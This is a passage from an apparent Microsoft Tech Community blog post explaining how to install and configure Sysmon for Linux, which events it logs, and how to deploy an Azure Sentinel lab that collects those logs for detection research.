<P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Run Sysmon as a Service</SPAN></FONT><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P><SPAN data-contrast="none">Finally, we can use the&nbsp;</SPAN><STRONG><SPAN data-contrast="none">sysmon</SPAN></STRONG><SPAN data-contrast="none">&nbsp;binary to install and run&nbsp;Sysmon as a service&nbsp;with a specific Sysmon config (like&nbsp;how one installs&nbsp;Sysmon for Windows).</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">sudo sysmon -accepteula -i sysmonconfig.xml</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_2-1634229152004.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317394i061BB3F893656A63/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_2-1634229152004.png" alt="Cyb3rWard0g_2-1634229152004.png" /></span></P> <P>&nbsp;</P> <H3 aria-level="2"><SPAN data-contrast="none"><FONT size="5">Explore Syslog Events</FONT>&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P><SPAN data-contrast="auto">You can explore Sysmon events from the&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">Syslog</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;log. 
Later in this post, I will show you how to use other tools to show Sysmon events in a more user-friendly view </SPAN><SPAN data-contrast="auto">;)</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">tail -f /var/log/syslog</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_3-1634229152008.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317398iDC9CCAE0C94B30DA/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_3-1634229152008.png" alt="Cyb3rWard0g_3-1634229152008.png" /></span></P> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">The Sysmon for Linux Configuration</SPAN></FONT><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <P><SPAN data-contrast="auto">At the time of writing, the Sysmon schema version is </SPAN><STRONG><SPAN data-contrast="auto">4.81</SPAN></STRONG><SPAN data-contrast="auto">; check here for the latest version. An example of a config that collects all events can be found at the following link (not recommended for a production environment because of the large number of events it generates):</SPAN></P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">SysmonForLinux-CollectAll-Config.xml (github.com)</SPAN></A><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">Use the following command to update the Sysmon config:</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">sudo sysmon -c newconfig.xml</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <H3 
aria-level="2"><FONT size="5"><SPAN data-contrast="none">Configuration Options</SPAN></FONT><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <TABLE data-tablestyle="MsoTable15Grid1LightAccent1" data-tablelook="1696" aria-rowcount="2"> <TBODY> <TR aria-rowindex="1"> <TD data-celllook="256"> <P><STRONG><SPAN data-contrast="auto">Option</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> <TD data-celllook="256"> <P><STRONG><SPAN data-contrast="auto">Description</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> <TD data-celllook="256"> <P><STRONG><SPAN data-contrast="auto">Sample</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> </TR> <TR aria-rowindex="2"> <TD data-celllook="0"> <P><STRONG><SPAN data-contrast="auto">FieldSizes</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> <TD data-celllook="0"> <P><SPAN data-contrast="auto">Specifies the maximum length of the named fields, so that a long value (a long command line, for example) does not overrun the Syslog message limit and produce truncated, broken XML.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> <TD data-celllook="0"> <P><SPAN data-contrast="auto">&lt;FieldSizes&gt;CommandLine:50,Image:50&lt;/FieldSizes&gt;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> </TR> </TBODY> </TABLE> <P aria-level="2"><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Available Events</SPAN></FONT><SPAN 
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <TABLE data-tablestyle="MsoTable15Grid1LightAccent1" data-tablelook="1696" aria-rowcount="9"> <TBODY> <TR aria-rowindex="1"> <TD data-celllook="256"> <P><STRONG><SPAN data-contrast="auto">Event ID</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> <TD data-celllook="256"> <P><STRONG><SPAN data-contrast="auto">Description</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> </TR> <TR aria-rowindex="2"> <TD data-celllook="0"> <P><STRONG><SPAN data-contrast="auto">1</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> <TD data-celllook="0"> <P><SPAN data-contrast="auto">Logs when a new process is created.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> </TR> <TR aria-rowindex="3"> <TD data-celllook="0"> <P><STRONG><SPAN data-contrast="auto">3</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> <TD data-celllook="0"> <P><SPAN data-contrast="auto">Logs TCP/UDP connections on the machine.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> </TR> <TR> <TD data-celllook="0"> <P><STRONG><SPAN data-contrast="auto">4</SPAN></STRONG></P> </TD> <TD data-celllook="0"> <P><SPAN data-contrast="auto">Logs the state of the Sysmon service (started or stopped).</SPAN></P> </TD> </TR> <TR aria-rowindex="4"> <TD data-celllook="0"> <P><STRONG><SPAN data-contrast="auto">5</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> 
</TD> <TD data-celllook="0"> <P><SPAN data-contrast="auto">Logs when a process terminates.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> </TR> <TR aria-rowindex="5"> <TD data-celllook="0"> <P><STRONG><SPAN data-contrast="auto">9</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> <TD data-celllook="0"> <P><SPAN data-contrast="auto">Logs when a process performs read operations directly against the drive.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> </TR> <TR aria-rowindex="6"> <TD data-celllook="0"> <P><STRONG><SPAN data-contrast="auto">11</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> <TD data-celllook="0"> <P><SPAN data-contrast="auto">Logs when a file is created or overwritten.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> </TR> <TR aria-rowindex="7"> <TD data-celllook="0"> <P><STRONG><SPAN data-contrast="auto">16</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> <TD data-celllook="0"> <P><SPAN data-contrast="auto">Logs when the local Sysmon configuration is updated.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> </TR> <TR aria-rowindex="8"> <TD data-celllook="0"> <P><STRONG><SPAN data-contrast="auto">23</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> <TD data-celllook="0"> <P><SPAN data-contrast="auto">Logs when a file is deleted by a process.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> </TD> </TR> </TBODY> </TABLE> <P><SPAN 
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">All the events in Sysmon for Linux are already documented as data dictionaries in the open-source project OSSEM. You can access that information at the following link:</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN>https://github.com/OTRF/OSSEM-DD/tree/main/linux/sysmon</SPAN><SPAN>&nbsp;<BR /></SPAN></A><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">The MSTIC Sysmon for Linux Configuration</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="none">The MSTIC R&amp;D team is sharing a few configuration files as part of the release of this project and will be maintaining them as we use them for research and the development of detections.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="none"><A href="#" target="_blank">MSTIC-Sysmon/linux/configs at main · microsoft/MSTIC-Sysmon (github.com)</A><BR /><BR /></SPAN></P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">How do we automate the installation process?</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="auto">The installation of Sysmon for Linux can be automated with the following bash script:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener"><SPAN 
data-contrast="none">https://raw.githubusercontent.com/OTRF/Blacksmith/master/resources/scripts/bash/Install-Sysmon-For-Linux.sh</SPAN></A><SPAN data-contrast="auto">&nbsp;</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H3 aria-level="1"><FONT size="5"><SPAN data-contrast="none">What about a full lab environment? Enter Azure Sentinel To-go!&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H3> <P><SPAN data-contrast="none">Azure Sentinel2Go is an open-source project developed to expedite the deployment of an Azure Sentinel lab, together with other Azure resources, for research and the development of detections.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none"><A href="#" target="_blank" rel="noopener">https://github.com/OTRF/Azure-Sentinel2Go</A></SPAN><SPAN><BR /></SPAN></P> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Azure Sentinel + Sysmon for Linux Environment</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="none">We have updated our previous Linux environment, and we can now deploy everything needed for a small research lab with Sysmon for Linux configured and an Azure monitor agent sending logs to Azure Sentinel:</SPAN></P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure-Sentinel2Go/grocery-list/Linux at master · OTRF/Azure-Sentinel2Go (github.com)</SPAN></A></P> <P>&nbsp;</P> <P><SPAN data-contrast="none">We were able to use </SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Resource Manager (ARM)</SPAN></A><SPAN 
data-contrast="none">&nbsp;templates and a bash script to automate the whole setup. These are all the resources used for each component of the&nbsp;research&nbsp;lab:&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="9" data-aria-level="1"><SPAN data-contrast="none">Azure Sentinel&nbsp;</SPAN> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="9" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Sentinel instance</SPAN></A><SPAN data-contrast="none">&nbsp;</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="9" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Syslog data connector</SPAN></A></LI> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="9" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Syslog data collection from specific facilities</SPAN></A></LI> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="9" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">ASIM Sysmon for Linux Parser</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> </LI> </UL> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="10" data-aria-level="1"><SPAN data-contrast="none">Linux Virtual Machines</SPAN> <UL> <LI data-leveltext="" data-font="Symbol" 
data-listid="20" aria-setsize="-1" data-aria-posinset="10" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Linux virtual machines</SPAN></A><SPAN data-contrast="none">&nbsp;</SPAN> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="10" data-aria-level="1"><SPAN data-contrast="none">Ubuntu 18.04.6 LTS (Kernel release: 5.4.0-1059-azure)</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="10" data-aria-level="1"><SPAN data-contrast="auto">CentOS 8.2.2004 (Kernel release: 4.18.0-193.28.1.el8_2.x86_64)</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="10" data-aria-level="1"><SPAN data-contrast="auto">Red Hat 8.2 (Kernel release: 4.18.0-193.65.2.el8_2.x86_64)</SPAN></LI> </UL> </LI> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="10" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Log Analytics Agent for Linux</SPAN></A></LI> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="10" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Sysmon for Linux Installer</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> </LI> </UL> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Deploying the Lab Environment&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="19" aria-setsize="-1" data-aria-posinset="11" data-aria-level="1"><SPAN data-contrast="none">Go to:&nbsp;</SPAN><A href="#" 
target="_blank" rel="noopener"><SPAN data-contrast="none">https://github.com/OTRF/Azure-Sentinel2Go/tree/master/grocery-list/Linux/demos/Sysmon-For-Linux</SPAN></A><SPAN data-contrast="none">&nbsp;</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="19" aria-setsize="-1" data-aria-posinset="12" data-aria-level="1"><SPAN data-contrast="none">Click the “</SPAN><I><SPAN data-contrast="none">Deploy to Azure</SPAN></I><SPAN data-contrast="none">” button</SPAN></LI> </UL> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_4-1634229152010.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317397i75133BDDC2CAC385/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_4-1634229152010.png" alt="Cyb3rWard0g_4-1634229152010.png" /></span></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="19" aria-setsize="-1" data-aria-posinset="13" data-aria-level="1"><SPAN data-contrast="none">Fill out the following parameters:</SPAN> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="19" aria-setsize="-1" data-aria-posinset="13" data-aria-level="1"><SPAN data-contrast="none">Subscription (selected by default)</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="19" aria-setsize="-1" data-aria-posinset="13" data-aria-level="1"><SPAN data-contrast="none">Resource group</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="19" aria-setsize="-1" data-aria-posinset="13" data-aria-level="1"><SPAN data-contrast="none">Region (selected by default)&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="19" aria-setsize="-1" data-aria-posinset="13" data-aria-level="1"><SPAN data-contrast="none">Admin Username</SPAN></LI> <LI data-leveltext="" 
data-font="Symbol" data-listid="19" aria-setsize="-1" data-aria-posinset="13" data-aria-level="1"><SPAN data-contrast="none">Admin Password</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="19" aria-setsize="-1" data-aria-posinset="13" data-aria-level="1"><SPAN data-contrast="none">Remote Access Mode (</SPAN><I><SPAN data-contrast="none">AllowPublicIP</SPAN></I><SPAN data-contrast="none"> is selected by default. You can also use an Azure Bastion host; you would then set the </SPAN><I><SPAN data-contrast="none">Allowed IP Addresses</SPAN></I><SPAN data-contrast="none"> parameter to *)</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="19" aria-setsize="-1" data-aria-posinset="13" data-aria-level="1"><SPAN data-contrast="none">Allowed IP Addresses (if you use the default access mode </SPAN><I><SPAN data-contrast="none">AllowPublicIP</SPAN></I><SPAN data-contrast="none">, use your home or office public IP address so that access is only allowed from trusted locations)</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> </LI> <LI data-leveltext="" data-font="Symbol" data-listid="22" aria-setsize="-1" data-aria-posinset="14" data-aria-level="1"><SPAN data-contrast="none">Click the Review &gt; Create buttons to start the deployment</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="22" aria-setsize="-1" data-aria-posinset="15" data-aria-level="1"><SPAN data-contrast="none">You can go to your resource group and explore all the resources being deployed</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P><SPAN data-contrast="none">&nbsp;</SPAN><SPAN 
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_5-1634229152012.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317399i6829CCDD6ED9B0E7/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_5-1634229152012.png" alt="Cyb3rWard0g_5-1634229152012.png" /></span></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="19" aria-setsize="-1" data-aria-posinset="16" data-aria-level="1"><SPAN data-contrast="none">Wait around 5-10 minutes! You should be good to go!</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_6-1634229152015.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317400i1D75B919086B26FF/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_6-1634229152015.png" alt="Cyb3rWard0g_6-1634229152015.png" /></span></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="15" aria-setsize="-1" data-aria-posinset="17" data-aria-level="1"><SPAN data-contrast="auto">You can go to the resource group and see all the resources&nbsp;</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P><SPAN data-contrast="none">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_7-1634229152019.png" style="width: 999px;"><img 
src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317401i87ABC8A50825354E/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_7-1634229152019.png" alt="Cyb3rWard0g_7-1634229152019.png" /></span></P> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Validate Deployment</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="none">It is very important to validate that everything was deployed properly before exploring Sysmon events.</SPAN></P> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Sysmon running as a service</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H3> <P><SPAN data-contrast="auto">SSH to all your VMs and run the following command:</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">systemctl status sysmon</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_8-1634229152099.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317402i7A22A0606A1F473C/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_8-1634229152099.png" alt="Cyb3rWard0g_8-1634229152099.png" /></span></P> <P>&nbsp;</P> <H3 aria-level="2"><SPAN data-contrast="none"><FONT size="5">Explore Syslog Events</FONT>&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P><SPAN data-contrast="auto">You can explore Sysmon events from the </SPAN><STRONG><SPAN data-contrast="auto">Syslog</SPAN></STRONG><SPAN data-contrast="auto"> log.</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">tail -f /var/log/syslog</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_9-1634229152043.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317403i1F1B0DF4472A998D/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_9-1634229152043.png" alt="Cyb3rWard0g_9-1634229152043.png" /></span></P> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Explore Sysmon Events via sysmonLogView</SPAN></FONT><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P><SPAN data-contrast="auto">Sysmon also comes with a binary named </SPAN><STRONG><SPAN data-contrast="auto">sysmonLogView</SPAN></STRONG><SPAN data-contrast="auto"> to explore Sysmon events in a friendly format.</SPAN></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_10-1634229152094.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317405i17846EDADA3116D1/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_10-1634229152094.png" alt="Cyb3rWard0g_10-1634229152094.png" /></span></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_11-1634229152083.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317404iD7E431E932169DBA/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_11-1634229152083.png" alt="Cyb3rWard0g_11-1634229152083.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Run the following command to explore </SPAN><STRONG><SPAN data-contrast="auto">Sysmon event id 1 (ProcessCreate)</SPAN></STRONG><SPAN data-contrast="auto"> events locally:</SPAN></P> <P>&nbsp;</P> 
<P>&nbsp;</P> <LI-CODE lang="bash">sudo tail -f /var/log/syslog | sudo /opt/sysmon/sysmonLogView -e 1</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="linux-sysmon-tail-sysmonlogview.png" style="width: 940px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317436i8FE92F43AA410997/image-size/large?v=v2&amp;px=999" role="button" title="linux-sysmon-tail-sysmonlogview.png" alt="linux-sysmon-tail-sysmonlogview.png" /></span></P> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Azure Sentinel</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H3> <P><SPAN data-contrast="auto">Check if you are getting Syslog events via the Azure Sentinel interface:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="14" aria-setsize="-1" data-aria-posinset="18" data-aria-level="1"><SPAN data-contrast="auto">&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">https://portal.azure.com/</SPAN></A><SPAN data-contrast="auto">&nbsp;</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="14" aria-setsize="-1" data-aria-posinset="19" data-aria-level="1"><SPAN data-contrast="auto">Search &gt; Azure Sentinel</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> 